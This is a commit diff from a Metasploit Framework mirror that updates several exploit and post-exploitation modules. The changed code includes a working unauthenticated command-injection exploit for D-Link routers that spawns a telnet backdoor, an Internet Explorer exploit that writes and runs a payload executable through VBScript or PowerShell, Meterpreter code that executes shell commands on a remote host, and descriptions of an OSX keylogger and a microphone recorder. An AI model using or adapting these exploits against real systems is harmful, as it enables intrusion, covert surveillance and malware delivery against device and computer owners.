infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update from master

bug/bundler_fix
Tab Assassin 2013-09-03 11:45:39 -05:00
parent 41e4375e43 791967282b
commit 0c1e6546af
8 changed files with 760 additions and 784 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
data/meterpreter/ext_server_stdapi.py
View File

@ -303,6 +303,7 @@ def channel_create_stdapi_fs_file(request, response):
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE) fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
if fmode: if fmode:
fmode = fmode['value'] fmode = fmode['value']
fmode = fmode.replace('bb', 'b')
else: else:
fmode = 'rb' fmode = 'rb'
file_h = open(fpath, fmode) file_h = open(fpath, fmode)
@ -320,6 +321,7 @@ def channel_create_stdapi_net_tcp_client(request, response):
connected = False connected = False
for i in range(retries + 1): for i in range(retries + 1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
if local_host.get('value') and local_port.get('value'): if local_host.get('value') and local_port.get('value'):
sock.bind((local_host['value'], local_port['value'])) sock.bind((local_host['value'], local_port['value']))
try: try:
@ -380,7 +382,7 @@ def stdapi_sys_process_execute(request, response):
if len(cmd) == 0: if len(cmd) == 0:
return ERROR_FAILURE, response return ERROR_FAILURE, response
if os.path.isfile('/bin/sh'): if os.path.isfile('/bin/sh'):
args = ['/bin/sh', '-c', cmd, raw_args] args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
else: else:
args = [cmd] args = [cmd]
args.extend(shlex.split(raw_args)) args.extend(shlex.split(raw_args))

2
data/meterpreter/meterpreter.py
View File

@ -404,5 +404,7 @@ class PythonMeterpreter(object):
return resp return resp
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s) met = PythonMeterpreter(s)
met.run() met.run()

149
modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
View File

@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -20,10 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
Different D-Link Routers are vulnerable to OS command injection via the web Different D-Link Routers are vulnerable to OS command injection via the web
interface. The vulnerability exists in command.php, which is accessible without interface. The vulnerability exists in command.php, which is accessible without
authentication. This module has been tested with the versions DIR-600 2.14b01, authentication. This module has been tested with the versions DIR-600 2.14b01,
DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service DIR-300 rev B 2.13.
and establish a session over it, the second one runs commands via the CMD target.
There is no wget or tftp client to upload an elf backdoor easily. According to the
vulnerability discoverer, more D-Link devices may affected.
}, },
'Author' => 'Author' =>
[ [
@ -42,61 +38,45 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DisclosureDate' => 'Feb 04 2013', 'DisclosureDate' => 'Feb 04 2013',
'Privileged' => true, 'Privileged' => true,
'Platform' => ['linux','unix'], 'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
'DisableNops' => true, 'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
}, },
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' => 'Targets' =>
[ [
[ 'CMD', #all devices [ 'Automatic', { } ]
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
], ],
[ 'Telnet', #all devices - default target 'DefaultTarget' => 0
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 1
)) ))
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
], self.class)
end
def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end
def session_timeout
(datastore['SessionTimeout'] || 10).to_i
end end
def exploit def exploit
if target.name =~ /CMD/
exploit_cmd
else
exploit_telnet
end
end
def exploit_cmd
if not (datastore['CMD'])
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
cmd = "#{payload.encoded}; echo end"
print_status("#{rhost}:#{rport} - Sending exploit request...")
res = request(cmd)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux, HTTP\/1.1, DIR/)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
if res.body.include?("end")
print_good("#{rhost}:#{rport} - Exploited successfully\n")
vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
vprint_line("#{rhost}:#{rport} - Output: #{res.body}")
else
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
return
end
def exploit_telnet
telnetport = rand(65535) telnetport = rand(65535)
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
@ -107,39 +87,33 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{rhost}:#{rport} - Sending exploit request...") print_status("#{rhost}:#{rport} - Sending exploit request...")
request(cmd) request(cmd)
begin print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock if sock.nil?
print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
add_socket(sock)
else
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end end
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
auth_info = { prompt = negotiate_telnet(sock)
:host => rhost, if prompt.nil?
:port => telnetport, sock.close
:sname => 'telnet', fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
:user => "", else
:pass => "", print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
:source_type => "exploit", end
:active => true
} print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
report_auth_info(auth_info) begin
merge_me = { Timeout.timeout(session_timeout) do
'USERPASS_FILE' => nil, activated = handler(sock)
'USER_FILE' => nil, while(activated !~ /claimed/)
'PASS_FILE' => nil, activated = handler(sock)
'USERNAME' => nil, end
'PASSWORD' => nil end
} rescue ::Timeout::Error
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
rescue
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service")
end end
return
end end
def request(cmd) def request(cmd)
@ -156,7 +130,24 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
return res return res
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
end end
end end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /\x23\x20$/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end end

120
modules/exploits/windows/browser/ie_unsafe_scripting.rb
View File

@ -6,12 +6,15 @@
## ##
require 'msf/core' require 'msf/core'
require 'msf/util/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Powershell
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -21,10 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
marked safe for scripting" setting within Internet Explorer. When this option is set, marked safe for scripting" setting within Internet Explorer. When this option is set,
IE allows access to the WScript.Shell ActiveX control, which allows javascript to IE allows access to the WScript.Shell ActiveX control, which allows javascript to
interact with the file system and run commands. This security flaw is not uncommon interact with the file system and run commands. This security flaw is not uncommon
in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to in corporate environments for the 'Intranet' or 'Trusted Site' zones.
save binary data to the file system, ADODB.Stream access is required, which in IE7
will trigger a cross domain access violation. As such, we write the code to a .vbs
file and execute it from there, where no such restrictions exist.
When set via domain policy, the most common registry entry to modify is HKLM\ When set via domain policy, the most common registry entry to modify is HKLM\
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
@ -35,96 +35,73 @@ class Metasploit3 < Msf::Exploit::Remote
via a direct GET http://msf-server/ or as a javascript include, such as in: via a direct GET http://msf-server/ or as a javascript include, such as in:
http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js> http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js>
</script>. </script>.
IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
an x64 iexplore.exe.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'natron' 'natron',
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # PSH and remove ADODB.Stream
], ],
'References' => 'References' =>
[ [
[ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://support.microsoft.com/kb/182569' ],
[ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
[ 'URL', 'http://support.microsoft.com/kb/870669']
], ],
'DisclosureDate' => 'Sep 20 2010', 'DisclosureDate' => 'Sep 20 2010',
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'HTTP::compression' => 'gzip' 'HTTP::compression' => 'gzip'
}, },
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
], self.class
)
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
#print_status("Starting...");
# Build out the HTML response page # Build out the HTML response page
var_shellobj = rand_text_alpha(rand(5)+5); var_shellobj = rand_text_alpha(rand(5)+5)
var_fsobj = rand_text_alpha(rand(5)+5);
var_fsobj_file = rand_text_alpha(rand(5)+5);
var_vbsname = rand_text_alpha(rand(5)+5);
var_writedir = rand_text_alpha(rand(5)+5);
var_exename = rand_text_alpha(rand(5)+5);
var_origLoc = rand_text_alpha(rand(5)+5);
var_byteArray = rand_text_alpha(rand(5)+5);
var_stream = rand_text_alpha(rand(5)+5);
var_writestream = rand_text_alpha(rand(5)+5);
var_strmConv = rand_text_alpha(rand(5)+5);
p = regenerate_payload(cli); p = regenerate_payload(cli)
print_status("Request received for #{request.uri}"); if datastore['TECHNIQUE'] == 'VBS'
exe = generate_payload_exe({ :code => p.encoded }) js_content = vbs_technique(var_shellobj, p)
#print_status("Building vbs file..."); else
# Build the content that will end up in the .vbs file js_content = psh_technique(var_shellobj, p)
vbs_content = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
print_status("Encoding payload into vbs/javascript/html...");
# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
# for conversion with ADODB.Stream
vbs_ary = []
# The output of this loop needs to be as small as possible since it
# gets repeated for every byte of the executable, ballooning it by a
# factor of about 80k (the current size of the exe template). In its
# current form, it's down to about 4MB on the wire
exe.each_byte do |b|
vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
end end
vbs_content << vbs_ary.join("")
# Continue with the rest of the vbs file; print_status("Request received for #{request.uri}")
# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent print_status("Sending exploit html/javascript");
# Then use ADODB.Stream again to write the binary to file.
#print_status("Finishing vbs...");
vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{var_exename}.exe"
Set #{var_strmConv} = CreateObject("ADODB.Stream") # Transmit the response to the client
send_response(cli, js_content, { 'Content-Type' => 'text/html' })
#{var_strmConv}.Type = 2 # Handle the payload
#{var_strmConv}.Charset = "x-ansi" handler(cli)
#{var_strmConv}.Open end
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2
SetLocale(#{var_origLoc})|) def vbs_technique(var_shellobj, p)
var_fsobj = rand_text_alpha(rand(5)+5)
var_fsobj_file = rand_text_alpha(rand(5)+5)
var_vbsname = rand_text_alpha(rand(5)+5)
var_writedir = rand_text_alpha(rand(5)+5)
# Encode the vbs_content exe = generate_payload_exe({ :code => p.encoded })
#print_status("Hex encoded vbs_content: #{vbs_content}"); vbs = Msf::Util::EXE.to_exe_vbs(exe)
vbs_content = Rex::Text.to_hex(vbs)
# Build the javascript that will be served # Build the javascript that will be served
js_content = %Q| js_content = %Q|
@ -138,18 +115,21 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
#{var_fsobj_file}.Close(); #{var_fsobj_file}.Close();
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{var_exename}.exe", 0, false);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
//</script></html> //</script></html>
| |
return js_content
end
print_status("Sending exploit html/javascript"); def psh_technique(var_shellobj, p)
print_status("Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target."); cmd = Rex::Text.to_hex(cmd_psh_payload(p.encoded))
js_content = %Q|
//<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
//</script></html>
|
# Transmit the response to the client return js_content
send_response(cli, js_content, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end end
end end

2
modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb
View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Firefox XMLSerializer Use After Free', 'Name' => 'Firefox XMLSerializer Use After Free',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically
an use after free of an Element object, when using the serializeToStream method a use-after-free of an Element object, when using the serializeToStream method
with a specially crafted OutputStream defining its own write function. This module with a specially crafted OutputStream defining its own write function. This module
has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP
SP3. SP3.

1
modules/exploits/windows/local/novell_client_nicm.rb
View File

@ -62,6 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
}, },
'References' => 'References' =>
[ [
[ 'CVE', '2013-3956' ],
[ 'OSVDB', '93718' ], [ 'OSVDB', '93718' ],
[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ], [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ],
[ 'URL', 'http://pastebin.com/GB4iiEwR' ] [ 'URL', 'http://pastebin.com/GB4iiEwR' ]

6
modules/post/osx/capture/keylog_recorder.rb
View File

@ -29,12 +29,12 @@ class Metasploit3 < Msf::Post
super(update_info(info, super(update_info(info,
'Name' => 'OSX Capture Userspace Keylogger', 'Name' => 'OSX Capture Userspace Keylogger',
'Description' => %q{ 'Description' => %q{
Logs all keyboard events except cmd-keys and GUI password input. This module logs all keyboard events except cmd-keys and GUI password input.
Keylogs are transferred between client/server in chunks Keylogs are transferred between client/server in chunks
every SYNCWAIT seconds for reliability. every SYNCWAIT seconds for reliability.
Works by calling the Carbon GetKeys() hook using the DL lib It works by calling the Carbon GetKeys() hook using the DL lib
in OSX's system Ruby. The Ruby code is executed in a shell in OSX's system Ruby. The Ruby code is executed in a shell
command using -e, so the payload never hits the disk. command using -e, so the payload never hits the disk.
}, },
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Post
"keylog", "text/plain", session, log, "keylog.log", "OSX keylog" "keylog", "text/plain", session, log, "keylog.log", "OSX keylog"
) )
else else
File.open(self.loot_path, 'a') { |f| f.write(log) } File.open(self.loot_path, 'ab') { |f| f.write(log) }
end end
print_status(log_a.map{ |a| a=~/([^\s]+)\s*$/; $1 }.join) print_status(log_a.map{ |a| a=~/([^\s]+)\s*$/; $1 }.join)
print_status "Saved to #{self.loot_path}" print_status "Saved to #{self.loot_path}"

2
modules/post/osx/manage/record_mic.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
super(update_info(info, super(update_info(info,
'Name' => 'OSX Manage Record Microphone', 'Name' => 'OSX Manage Record Microphone',
'Description' => %q{ 'Description' => %q{
This module will allow you to detect (with the LIST action) and This module will allow the user to detect (with the LIST action) and
capture (with the RECORD action) audio inputs on a remote OSX machine. capture (with the RECORD action) audio inputs on a remote OSX machine.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,